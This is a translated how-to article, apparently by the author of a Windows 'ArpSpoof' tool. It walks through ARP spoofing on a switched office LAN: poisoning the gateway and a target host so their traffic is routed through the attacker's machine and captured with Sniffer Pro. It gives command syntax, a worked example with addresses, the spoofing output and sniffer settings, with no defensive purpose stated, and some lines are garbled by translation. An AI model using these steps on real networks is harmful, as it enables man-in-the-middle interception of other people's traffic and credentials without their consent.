Implementation of ARP Sniffer in Windows switching Environment

Source: ChinaITLab

According to the Sniffer implementation principle in the switching environment (For details, refer to the Sniffer implementation in the switching environment), I wrote an Arp Sniffer implementation similar to the ArpSpoof implementation in the Linux environment.
　　
In Windows, Sniffer must meet the following requirements:
　　
1. Install the Winpcap driver.
　　
2. I wrote an ArpSpoof similar to the Linux environment (I have tested it only in Windows 2000 Server, and I look forward to your testing ).
　　
3. A Sniffer, such as NetXray or NAI Sniffer Pro (recommended ).
　　
Specific implementation methods:
　　
Use ArpSpoof to implement ARP-based spoofing:
　　
C:> arpspoof.exe
ARPSpoof, by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, dansnow@21cn.com
　　
Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
　　　
　　
Spoof IP1 and Spoof IP2 are IP addresses for spoofing and sniffing, the Own IP address is your Own IP address (note that the three IP addresses must not span the vswitch or vro within the same LAN ).
　　
For example, the company's LAN environment is 192.168.0.xxx, The subnet mask is 255.255.255.0, And the gateway is 192.168.0.1. Our IP address is 192.168.0.29 and we want the packet Sniffer 192.168.0.2.
　　
Because the gateway is 192.168.0.1, we only need to cheat 192.168.0.1 and 192.168.0.2. In other words, tell 192.168.0.1 that the MAC address of 192.168.0.2 is itself (192.168.0.29), then tell 192.168.0.2 that the MAC address of 192.168.0.1 is itself (192.168.0.29 ). In this way, all data packets are sent to 192.168.0.29 and forwarded by 192.168.0.29. (For windows 2000, packet forwarding is enabled by default. For Windows 9. I have not tested x and Windows NT/XP. I hope you can tell me ).
　　
C:> arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
ARPSpoof, by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, dansnow@21cn.com
　　
Begin Spoof .........
　　
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
........................................ .............
　　
It is time to start ARP spoofing on 192.168.0.1 and 192.168.0.2. On 192.168.0.1, run the arp-a command to check that the MAC addresses of 192.168.0.2 and 192.168.0.29 are the same.
　　
C:> arp-
　　
Interface: 192.168.0.1 on Interface 0x1000004
Internet Address Physical Address Type
192.168.0.2 00-00-86-61-6b-4e dynamic
192.168.0.29 00-00-86-61-6b-4e dynamic
　　
The MAC addresses of 192.168.0.1 and 192.168.0.29 are the same on 192.168.0.2.
　　
In this way, ARP spoofing is implemented between 192.168.0.1 and 192.168.0.2.
　　
Start Sniffer Pro and select Hardware in Address Type in Define Filter (Be sure not to select the normal Type IP Address; otherwise, you cannot find anything meaningful ), set Station1 and Station2 to Any.
　　
　　
Sniffer starts at this time.
　　
　　
The above results are successfully tested in my LAN environment and are not necessarily applicable to all environments.
　　
I got a lot of assistance from BB in the development and testing process, which delayed the time for reading gossip news. I felt guilty for a long time ......:-)